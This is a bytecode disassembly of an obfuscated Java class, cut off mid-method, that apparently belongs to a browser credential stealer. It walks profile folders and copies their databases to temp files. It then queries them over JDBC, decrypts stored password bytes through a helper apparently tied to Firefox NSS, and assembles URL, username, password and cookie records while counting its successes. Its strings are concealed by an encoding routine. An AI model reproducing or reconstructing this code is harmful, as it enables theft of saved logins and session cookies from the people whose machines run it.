Compiled from "v.java"
public class a.b.d.v {
  private static final java.lang.String s;

  private static final java.lang.String y;

  private static int l;

  private static int p;

  private static int q;

  private static int S;

  private static final java.lang.String[] a;

  private static final java.lang.String[] b;

  private static final long[] c;

  private static final java.lang.Long[] d;

  public a.b.d.v();
    Code:
         0: aload_0
         1: invokespecial #253                // Method java/lang/Object."<init>":()V
         4: return

  public static void r();
    Code:
         0: ldc2_w        #363                // long 31530587324288l
         3: lstore_0
         4: lload_0
         5: dup2
         6: ldc2_w        #371                // long 118421388747033l
         9: lxor
        10: lstore_2
        11: pop2
        12: iconst_0
        13: putstatic     #323                // Field l:I
        16: iconst_0
        17: putstatic     #144                // Field p:I
        20: iconst_0
        21: putstatic     #344                // Field q:I
        24: iconst_0
        25: putstatic     #111                // Field S:I
        28: ldc           #14                 // int 1232451210
        30: sipush        -4430
        33: i2c
        34: isub
        35: ldc           #21                 // int -1232451210
        37: sipush        -564
        40: i2c
        41: ineg
        42: isub
        43: lload_0
        44: l2i
        45: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
        48: invokestatic  #142                // Method a/b/d/dec.k:(Ljava/lang/String;)V
        51: getstatic     #36                 // Field y:Ljava/lang/String;
        54: ldc           #22                 // String
        56: invokestatic  #211                // Method a/b/d/dec.g:(Ljava/lang/String;Ljava/lang/String;)V
        59: lload_2
        60: iconst_1
        61: anewarray     #317                // class java/lang/Object
        64: dup_x2
        65: dup_x2
        66: pop
        67: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        70: iconst_0
        71: swap
        72: aastore
        73: invokestatic  #42                 // Method j:([Ljava/lang/Object;)V
        76: ldc           #14                 // int 1232451210
        78: sipush        -4437
        81: i2c
        82: isub
        83: ldc           #14                 // int 1232451210
        85: sipush        -3697
        88: i2c
        89: isub
        90: lload_0
        91: l2i
        92: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
        95: ldc           #14                 // int 1232451210
        97: sipush        -4412
       100: i2c
       101: isub
       102: ldc           #14                 // int 1232451210
       104: sipush        -15786
       107: i2c
       108: isub
       109: lload_0
       110: l2i
       111: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       114: getstatic     #323                // Field l:I
       117: invokestatic  #257                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       120: ldc           #14                 // int 1232451210
       122: sipush        -4463
       125: i2c
       126: isub
       127: ldc           #14                 // int 1232451210
       129: sipush        -6217
       132: i2c
       133: isub
       134: lload_0
       135: l2i
       136: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       139: ldc           #14                 // int 1232451210
       141: sipush        -4462
       144: i2c
       145: isub
       146: ldc           #14                 // int 1232451210
       148: sipush        -592
       151: i2c
       152: isub
       153: lload_0
       154: l2i
       155: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       158: getstatic     #144                // Field p:I
       161: invokestatic  #257                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       164: ldc           #14                 // int 1232451210
       166: sipush        -4463
       169: i2c
       170: isub
       171: ldc           #14                 // int 1232451210
       173: sipush        -6217
       176: i2c
       177: isub
       178: lload_0
       179: l2i
       180: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       183: ldc           #14                 // int 1232451210
       185: sipush        -4456
       188: i2c
       189: isub
       190: ldc           #20                 // int 1232320140
       192: sipush        -9692
       195: i2c
       196: iadd
       197: lload_0
       198: l2i
       199: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       202: getstatic     #344                // Field q:I
       205: invokestatic  #257                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       208: ldc           #14                 // int 1232451210
       210: sipush        -4463
       213: i2c
       214: isub
       215: ldc           #14                 // int 1232451210
       217: sipush        -6217
       220: i2c
       221: isub
       222: lload_0
       223: l2i
       224: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       227: ldc           #14                 // int 1232451210
       229: sipush        -4455
       232: i2c
       233: isub
       234: ldc           #14                 // int 1232451210
       236: sipush        -3989
       239: i2c
       240: isub
       241: lload_0
       242: l2i
       243: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       246: getstatic     #111                // Field S:I
       249: invokestatic  #257                // Method a/b/e/r.r3k:(Ljava/lang/String;Ljava/lang/String;I)V
       252: return

  private static void j(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #352                // class java/lang/Long
         7: invokevirtual #103                // Method java/lang/Long.longValue:()J
        10: lstore_1
        11: pop
        12: lload_1
        13: dup2
        14: ldc2_w        #367                // long 54824229633198l
        17: lxor
        18: lstore_3
        19: pop2
        20: getstatic     #240                // Field a/b/d/dec$NssSec.m:Z
        23: new           #80                 // class java/io/File
        26: dup
        27: getstatic     #36                 // Field y:Ljava/lang/String;
        30: invokespecial #351                // Method java/io/File."<init>":(Ljava/lang/String;)V
        33: astore        6
        35: istore        5
        37: aload         6
        39: iload         5
        41: ifne          58
        44: invokevirtual #55                 // Method java/io/File.exists:()Z
        47: ifne          56
        50: goto          54
        53: athrow
        54: return
        55: athrow
        56: aload         6
        58: invokevirtual #116                // Method java/io/File.listFiles:()[Ljava/io/File;
        61: astore        7
        63: aload         7
        65: iload         5
        67: ifne          80
        70: ifnonnull     78
        73: goto          77
        76: athrow
        77: return
        78: aload         7
        80: astore        8
        82: aload         8
        84: arraylength
        85: istore        9
        87: iconst_0
        88: istore        10
        90: iload         10
        92: iload         9
        94: if_icmpge     276
        97: aload         8
        99: iload         10
       101: aaload
       102: astore        11
       104: iload         5
       106: lload_1
       107: lconst_0
       108: lcmp
       109: ifle          273
       112: ifne          271
       115: aload         11
       117: invokevirtual #280                // Method java/io/File.isDirectory:()Z
       120: ifeq          268
       123: goto          127
       126: athrow
       127: aload         11
       129: iload         5
       131: ifne          227
       134: goto          138
       137: athrow
       138: lload_1
       139: lconst_0
       140: lcmp
       141: iflt          223
       144: invokevirtual #209                // Method java/io/File.getName:()Ljava/lang/String;
       147: ldc           #12                 // int 1773901380
       149: sipush        4268
       152: iadd
       153: ldc           #12                 // int 1773901380
       155: sipush        18891
       158: iadd
       159: lload_1
       160: l2i
       161: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       164: invokevirtual #96                 // Method java/lang/String.equals:(Ljava/lang/Object;)Z
       167: ifne          221
       170: goto          174
       173: athrow
       174: lload_1
       175: lconst_0
       176: lcmp
       177: ifle          263
       180: aload         11
       182: iload         5
       184: ifne          227
       187: goto          191
       190: athrow
       191: invokevirtual #209                // Method java/io/File.getName:()Ljava/lang/String;
       194: ldc           #12                 // int 1773901380
       196: sipush        4228
       199: iadd
       200: ldc           #7                  // int -1773901380
       202: sipush        -14455
       205: iadd
       206: lload_1
       207: l2i
       208: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       211: invokevirtual #306                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       214: ifeq          268
       217: goto          221
       220: athrow
       221: aload         11
       223: goto          227
       226: athrow
       227: lload_3
       228: iconst_2
       229: anewarray     #317                // class java/lang/Object
       232: dup_x2
       233: dup_x2
       234: pop
       235: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       238: iconst_1
       239: swap
       240: aastore
       241: dup_x1
       242: swap
       243: iconst_0
       244: swap
       245: aastore
       246: invokestatic  #264                // Method H:([Ljava/lang/Object;)V
       249: sipush        6514
       252: ldc2_w        #373                // long 7703181024234333400l
       255: lload_1
       256: lxor
       257: invokestatic  #262                // Method a:(IJ)J
       260: invokestatic  #59                 // Method java/lang/Thread.sleep:(J)V
       263: goto          268
       266: astore        12
       268: iinc          10, 1
       271: iload         5
       273: ifeq          90
       276: return
      Exception table:
         from    to  target type
           191   223   226   Class java/lang/Exception
           174   217   220   Class java/lang/Exception
           138   187   190   Class java/lang/Exception
           127   170   173   Class java/lang/Exception
           115   134   137   Class java/lang/Exception
           104   123   126   Class java/lang/Exception
            63    73    76   Class java/lang/Exception
            44    55    55   Class java/lang/Exception
            37    50    53   Class java/lang/Exception
           249   263   266   Class java/lang/Exception

  private static void H(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #80                 // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #352                // class java/lang/Long
        14: invokevirtual #103                // Method java/lang/Long.longValue:()J
        17: lstore_2
        18: pop
        19: lload_2
        20: dup2
        21: ldc2_w        #361                // long 51209651123960l
        24: lxor
        25: lstore        4
        27: pop2
        28: aload_1
        29: invokevirtual #209                // Method java/io/File.getName:()Ljava/lang/String;
        32: astore        6
        34: aload_1
        35: ldc           #11                 // int -1426041600
        37: sipush        -31371
        40: i2c
        41: ineg
        42: isub
        43: ldc           #17                 // int 1426041600
        45: sipush        -31752
        48: i2c
        49: isub
        50: lload_2
        51: l2i
        52: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
        55: ldc           #11                 // int -1426041600
        57: sipush        -31388
        60: i2c
        61: ineg
        62: isub
        63: ldc           #11                 // int -1426041600
        65: sipush        -16354
        68: isub
        69: lload_2
        70: l2i
        71: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
        74: aload         6
        76: ldc           #11                 // int -1426041600
        78: sipush        -31389
        81: i2c
        82: ineg
        83: isub
        84: ldc           #11                 // int -1426041600
        86: sipush        -23304
        89: isub
        90: lload_2
        91: l2i
        92: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
        95: iconst_1
        96: lload         4
        98: bipush        7
       100: anewarray     #317                // class java/lang/Object
       103: dup_x2
       104: dup_x2
       105: pop
       106: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       109: bipush        6
       111: swap
       112: aastore
       113: dup_x1
       114: swap
       115: invokestatic  #155                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       118: iconst_5
       119: swap
       120: aastore
       121: dup_x1
       122: swap
       123: iconst_4
       124: swap
       125: aastore
       126: dup_x1
       127: swap
       128: iconst_3
       129: swap
       130: aastore
       131: dup_x1
       132: swap
       133: iconst_2
       134: swap
       135: aastore
       136: dup_x1
       137: swap
       138: iconst_1
       139: swap
       140: aastore
       141: dup_x1
       142: swap
       143: iconst_0
       144: swap
       145: aastore
       146: invokestatic  #122                // Method r:([Ljava/lang/Object;)V
       149: aload_1
       150: ldc           #11                 // int -1426041600
       152: sipush        -31385
       155: i2c
       156: ineg
       157: isub
       158: ldc           #11                 // int -1426041600
       160: sipush        -13252
       163: isub
       164: lload_2
       165: l2i
       166: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       169: ldc           #11                 // int -1426041600
       171: sipush        -31421
       174: i2c
       175: ineg
       176: isub
       177: ldc           #17                 // int 1426041600
       179: sipush        -31128
       182: i2c
       183: isub
       184: lload_2
       185: l2i
       186: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       189: aload         6
       191: ldc           #11                 // int -1426041600
       193: sipush        -31424
       196: i2c
       197: ineg
       198: isub
       199: ldc           #17                 // int 1426041600
       201: sipush        -31319
       204: i2c
       205: isub
       206: lload_2
       207: l2i
       208: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       211: iconst_2
       212: lload         4
       214: bipush        7
       216: anewarray     #317                // class java/lang/Object
       219: dup_x2
       220: dup_x2
       221: pop
       222: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       225: bipush        6
       227: swap
       228: aastore
       229: dup_x1
       230: swap
       231: invokestatic  #155                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       234: iconst_5
       235: swap
       236: aastore
       237: dup_x1
       238: swap
       239: iconst_4
       240: swap
       241: aastore
       242: dup_x1
       243: swap
       244: iconst_3
       245: swap
       246: aastore
       247: dup_x1
       248: swap
       249: iconst_2
       250: swap
       251: aastore
       252: dup_x1
       253: swap
       254: iconst_1
       255: swap
       256: aastore
       257: dup_x1
       258: swap
       259: iconst_0
       260: swap
       261: aastore
       262: invokestatic  #122                // Method r:([Ljava/lang/Object;)V
       265: aload_1
       266: ldc           #11                 // int -1426041600
       268: sipush        -31363
       271: i2c
       272: ineg
       273: isub
       274: ldc           #11                 // int -1426041600
       276: sipush        -29660
       279: isub
       280: lload_2
       281: l2i
       282: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       285: ldc           #11                 // int -1426041600
       287: sipush        -31393
       290: i2c
       291: ineg
       292: isub
       293: ldc           #17                 // int 1426041600
       295: sipush        25786
       298: isub
       299: lload_2
       300: l2i
       301: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       304: aload         6
       306: ldc           #11                 // int -1426041600
       308: sipush        -31364
       311: i2c
       312: ineg
       313: isub
       314: ldc           #11                 // int -1426041600
       316: sipush        -30664
       319: i2c
       320: ineg
       321: isub
       322: lload_2
       323: l2i
       324: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       327: iconst_3
       328: lload         4
       330: bipush        7
       332: anewarray     #317                // class java/lang/Object
       335: dup_x2
       336: dup_x2
       337: pop
       338: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       341: bipush        6
       343: swap
       344: aastore
       345: dup_x1
       346: swap
       347: invokestatic  #155                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       350: iconst_5
       351: swap
       352: aastore
       353: dup_x1
       354: swap
       355: iconst_4
       356: swap
       357: aastore
       358: dup_x1
       359: swap
       360: iconst_3
       361: swap
       362: aastore
       363: dup_x1
       364: swap
       365: iconst_2
       366: swap
       367: aastore
       368: dup_x1
       369: swap
       370: iconst_1
       371: swap
       372: aastore
       373: dup_x1
       374: swap
       375: iconst_0
       376: swap
       377: aastore
       378: invokestatic  #122                // Method r:([Ljava/lang/Object;)V
       381: aload_1
       382: ldc           #11                 // int -1426041600
       384: sipush        -31415
       387: i2c
       388: ineg
       389: isub
       390: ldc           #11                 // int -1426041600
       392: sipush        -17434
       395: isub
       396: lload_2
       397: l2i
       398: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       401: ldc           #11                 // int -1426041600
       403: sipush        -31423
       406: i2c
       407: ineg
       408: isub
       409: ldc           #17                 // int 1426041600
       411: sipush        18588
       414: isub
       415: lload_2
       416: l2i
       417: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       420: aload         6
       422: ldc           #11                 // int -1426041600
       424: sipush        -31391
       427: i2c
       428: ineg
       429: isub
       430: ldc           #11                 // int -1426041600
       432: sipush        -22616
       435: isub
       436: lload_2
       437: l2i
       438: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       441: iconst_5
       442: lload         4
       444: bipush        7
       446: anewarray     #317                // class java/lang/Object
       449: dup_x2
       450: dup_x2
       451: pop
       452: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       455: bipush        6
       457: swap
       458: aastore
       459: dup_x1
       460: swap
       461: invokestatic  #155                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       464: iconst_5
       465: swap
       466: aastore
       467: dup_x1
       468: swap
       469: iconst_4
       470: swap
       471: aastore
       472: dup_x1
       473: swap
       474: iconst_3
       475: swap
       476: aastore
       477: dup_x1
       478: swap
       479: iconst_2
       480: swap
       481: aastore
       482: dup_x1
       483: swap
       484: iconst_1
       485: swap
       486: aastore
       487: dup_x1
       488: swap
       489: iconst_0
       490: swap
       491: aastore
       492: invokestatic  #122                // Method r:([Ljava/lang/Object;)V
       495: aload_1
       496: ldc           #11                 // int -1426041600
       498: sipush        -31372
       501: i2c
       502: ineg
       503: isub
       504: ldc           #17                 // int 1426041600
       506: sipush        19161
       509: isub
       510: lload_2
       511: l2i
       512: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       515: ldc           #11                 // int -1426041600
       517: sipush        -31367
       520: i2c
       521: ineg
       522: isub
       523: ldc           #11                 // int -1426041600
       525: sipush        -27551
       528: i2c
       529: ineg
       530: isub
       531: lload_2
       532: l2i
       533: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       536: aload         6
       538: ldc           #11                 // int -1426041600
       540: sipush        -31412
       543: i2c
       544: ineg
       545: isub
       546: ldc           #17                 // int 1426041600
       548: sipush        14778
       551: isub
       552: lload_2
       553: l2i
       554: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       557: iconst_4
       558: lload         4
       560: bipush        7
       562: anewarray     #317                // class java/lang/Object
       565: dup_x2
       566: dup_x2
       567: pop
       568: invokestatic  #238                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
       571: bipush        6
       573: swap
       574: aastore
       575: dup_x1
       576: swap
       577: invokestatic  #155                // Method java/lang/Integer.valueOf:(I)Ljava/lang/Integer;
       580: iconst_5
       581: swap
       582: aastore
       583: dup_x1
       584: swap
       585: iconst_4
       586: swap
       587: aastore
       588: dup_x1
       589: swap
       590: iconst_3
       591: swap
       592: aastore
       593: dup_x1
       594: swap
       595: iconst_2
       596: swap
       597: aastore
       598: dup_x1
       599: swap
       600: iconst_1
       601: swap
       602: aastore
       603: dup_x1
       604: swap
       605: iconst_0
       606: swap
       607: aastore
       608: invokestatic  #122                // Method r:([Ljava/lang/Object;)V
       611: return

  private static void r(java.lang.Object[]);
    Code:
         0: aload_0
         1: dup
         2: iconst_0
         3: aaload
         4: checkcast     #80                 // class java/io/File
         7: astore_1
         8: dup
         9: iconst_1
        10: aaload
        11: checkcast     #89                 // class java/lang/String
        14: astore_2
        15: dup
        16: iconst_2
        17: aaload
        18: checkcast     #89                 // class java/lang/String
        21: astore_3
        22: dup
        23: iconst_3
        24: aaload
        25: checkcast     #89                 // class java/lang/String
        28: astore        4
        30: dup
        31: iconst_4
        32: aaload
        33: checkcast     #89                 // class java/lang/String
        36: astore        5
        38: dup
        39: iconst_5
        40: aaload
        41: checkcast     #28                 // class java/lang/Integer
        44: invokevirtual #67                 // Method java/lang/Integer.intValue:()I
        47: istore        6
        49: dup
        50: bipush        6
        52: aaload
        53: checkcast     #352                // class java/lang/Long
        56: invokevirtual #103                // Method java/lang/Long.longValue:()J
        59: lstore        7
        61: pop
        62: getstatic     #240                // Field a/b/d/dec$NssSec.m:Z
        65: new           #80                 // class java/io/File
        68: dup
        69: aload_1
        70: aload_2
        71: invokespecial #194                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        74: astore        10
        76: istore        9
        78: aload         10
        80: invokevirtual #55                 // Method java/io/File.exists:()Z
        83: iload         9
        85: ifne          156
        88: ifne          142
        91: goto          95
        94: athrow
        95: iload         6
        97: iload         9
        99: ifne          156
       102: goto          106
       105: athrow
       106: iconst_2
       107: if_icmpne     142
       110: goto          114
       113: athrow
       114: new           #80                 // class java/io/File
       117: dup
       118: aload_1
       119: ldc           #13                 // int -2045740560
       121: sipush        -12970
       124: isub
       125: ldc           #13                 // int -2045740560
       127: sipush        -30685
       130: isub
       131: lload         7
       133: l2i
       134: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       137: invokespecial #194                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
       140: astore        10
       142: aload         10
       144: iload         9
       146: ifne          194
       149: invokevirtual #55                 // Method java/io/File.exists:()Z
       152: goto          156
       155: athrow
       156: ifne          160
       159: return
       160: new           #80                 // class java/io/File
       163: dup
       164: ldc           #13                 // int -2045740560
       166: sipush        -13007
       169: isub
       170: ldc           #1                  // int 2045740560
       172: sipush        24496
       175: isub
       176: lload         7
       178: l2i
       179: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       182: invokestatic  #91                 // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       185: invokestatic  #133                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       188: invokevirtual #200                // Method java/util/UUID.toString:()Ljava/lang/String;
       191: invokespecial #356                // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       194: astore        11
       196: aload         10
       198: iload         9
       200: ifne          245
       203: aload         11
       205: ldc           #13                 // int -2045740560
       207: sipush        -12952
       210: isub
       211: ldc           #13                 // int -2045740560
       213: sipush        -21952
       216: isub
       217: lload         7
       219: l2i
       220: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       223: invokestatic  #37                 // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       226: lload         7
       228: lconst_0
       229: lcmp
       230: iflt          241
       233: ifne          243
       236: aload         11
       238: invokevirtual #198                // Method java/io/File.delete:()Z
       241: pop
       242: return
       243: aload         11
       245: invokevirtual #303                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       248: ldc           #13                 // int -2045740560
       250: sipush        -12954
       253: isub
       254: ldc           #1                  // int 2045740560
       256: sipush        13031
       259: isub
       260: lload         7
       262: l2i
       263: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       266: swap
       267: invokedynamic #164,  0            // InvokeDynamic #0:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       272: invokestatic  #282                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       275: astore        12
       277: aload         12
       279: invokeinterface #332,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       284: astore        13
       286: aload         13
       288: aload_3
       289: invokeinterface #320,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       294: astore        14
       296: new           #206                // class java/lang/StringBuilder
       299: dup
       300: invokespecial #30                 // Method java/lang/StringBuilder."<init>":()V
       303: astore        15
       305: iload         6
       307: iconst_5
       308: iload         9
       310: ifne          545
       313: if_icmpne     519
       316: goto          320
       319: athrow
       320: aload         14
       322: invokeinterface #156,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       327: ifeq          1467
       330: goto          334
       333: athrow
       334: aload         14
       336: iconst_5
       337: invokeinterface #24,  2           // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
       342: invokestatic  #74                 // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
       345: astore        16
       347: iload         9
       349: ifne          382
       352: aload         16
       354: iload         9
       356: ifne          1518
       359: goto          363
       362: athrow
       363: ifnull        514
       366: goto          370
       369: athrow
       370: getstatic     #111                // Field S:I
       373: iconst_1
       374: iadd
       375: putstatic     #111                // Field S:I
       378: goto          382
       381: athrow
       382: aload         15
       384: ldc           #13                 // int -2045740560
       386: sipush        -12947
       389: isub
       390: ldc           #13                 // int -2045740560
       392: sipush        -32517
       395: i2c
       396: ineg
       397: isub
       398: lload         7
       400: l2i
       401: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       404: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       407: aload         14
       409: iconst_2
       410: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       415: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       418: ldc           #13                 // int -2045740560
       420: sipush        -12944
       423: isub
       424: ldc           #13                 // int -2045740560
       426: sipush        -20869
       429: isub
       430: lload         7
       432: l2i
       433: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       436: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       439: aload         16
       441: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       444: ldc           #13                 // int -2045740560
       446: sipush        -12963
       449: isub
       450: ldc           #1                  // int 2045740560
       452: sipush        24420
       455: isub
       456: lload         7
       458: l2i
       459: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       462: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       465: aload         14
       467: iconst_3
       468: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       473: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       476: ldc           #8                  // String /
       478: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       481: aload         14
       483: iconst_4
       484: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       489: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       492: ldc           #13                 // int -2045740560
       494: sipush        -12962
       497: isub
       498: ldc           #1                  // int 2045740560
       500: sipush        18834
       503: isub
       504: lload         7
       506: l2i
       507: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       510: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       513: pop
       514: iload         9
       516: ifeq          320
       519: iload         6
       521: lload         7
       523: lconst_0
       524: lcmp
       525: ifle          1765
       528: iload         9
       530: lload         7
       532: lconst_0
       533: lcmp
       534: ifle          541
       537: ifne          856
       540: iconst_4
       541: goto          545
       544: athrow
       545: if_icmpne     845
       548: new           #255                // class java/text/SimpleDateFormat
       551: dup
       552: ldc           #13                 // int -2045740560
       554: sipush        -12951
       557: isub
       558: ldc           #13                 // int -2045740560
       560: sipush        -10867
       563: isub
       564: lload         7
       566: l2i
       567: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       570: invokespecial #157                // Method java/text/SimpleDateFormat."<init>":(Ljava/lang/String;)V
       573: astore        16
       575: aload         14
       577: invokeinterface #156,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       582: ifeq          826
       585: aload         14
       587: iconst_4
       588: invokeinterface #141,  2          // InterfaceMethod java/sql/ResultSet.getLong:(I)J
       593: lstore        17
       595: lload         17
       597: lconst_0
       598: lcmp
       599: iload         9
       601: ifne          1479
       604: ifle          655
       607: goto          611
       610: athrow
       611: aload         16
       613: new           #341                // class java/util/Date
       616: dup
       617: lload         17
       619: sipush        8773
       622: ldc2_w        #357                // long 3499192132713108920l
       625: lload         7
       627: lxor
       628: invokestatic  #262                // Method a:(IJ)J
       631: ldiv
       632: sipush        532
       635: ldc2_w        #365                // long 5526982858065311211l
       638: lload         7
       640: lxor
       641: invokestatic  #262                // Method a:(IJ)J
       644: lsub
       645: invokespecial #285                // Method java/util/Date."<init>":(J)V
       648: invokevirtual #313                // Method java/text/SimpleDateFormat.format:(Ljava/util/Date;)Ljava/lang/String;
       651: goto          673
       654: athrow
       655: ldc           #13                 // int -2045740560
       657: sipush        -12965
       660: isub
       661: ldc           #13                 // int -2045740560
       663: sipush        -4147
       666: isub
       667: lload         7
       669: l2i
       670: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       673: astore        19
       675: aload         15
       677: ldc           #13                 // int -2045740560
       679: sipush        -12958
       682: isub
       683: ldc           #1                  // int 2045740560
       685: sipush        9442
       688: isub
       689: lload         7
       691: l2i
       692: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       695: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       698: aload         14
       700: iconst_1
       701: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       706: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       709: ldc           #13                 // int -2045740560
       711: sipush        -12964
       714: isub
       715: ldc           #1                  // int 2045740560
       717: sipush        17903
       720: isub
       721: lload         7
       723: l2i
       724: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       727: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       730: aload         14
       732: iconst_2
       733: invokeinterface #251,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       738: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       741: ldc           #13                 // int -2045740560
       743: sipush        -12968
       746: isub
       747: ldc           #13                 // int -2045740560
       749: sipush        -3049
       752: isub
       753: lload         7
       755: l2i
       756: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       759: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       762: aload         14
       764: iconst_3
       765: invokeinterface #260,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
       770: invokevirtual #265                // Method java/lang/StringBuilder.append:(I)Ljava/lang/StringBuilder;
       773: ldc           #13                 // int -2045740560
       775: sipush        -12980
       778: isub
       779: ldc           #13                 // int -2045740560
       781: sipush        -19508
       784: isub
       785: lload         7
       787: l2i
       788: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       791: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       794: aload         19
       796: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       799: ldc           #13                 // int -2045740560
       801: sipush        -12946
       804: isub
       805: ldc           #13                 // int -2045740560
       807: sipush        -15709
       810: isub
       811: lload         7
       813: l2i
       814: invokestatic  #72                 // Method a:(III)Ljava/lang/String;
       817: invokevirtual #205                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       820: pop
       821: iload         9
       823: ifeq          575
       826: iload         9
       828: lload         7
       830: lconst_0
       831: lcmp
       832: ifle          1479
       835: lload         7
       837: lconst_0
       838: lcmp
       839: ifle          852
       842: ifeq          1467
       845: aload         14
       847: invokeinterface #156,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       852: goto          856
       855: athrow
       856: ifeq          1467
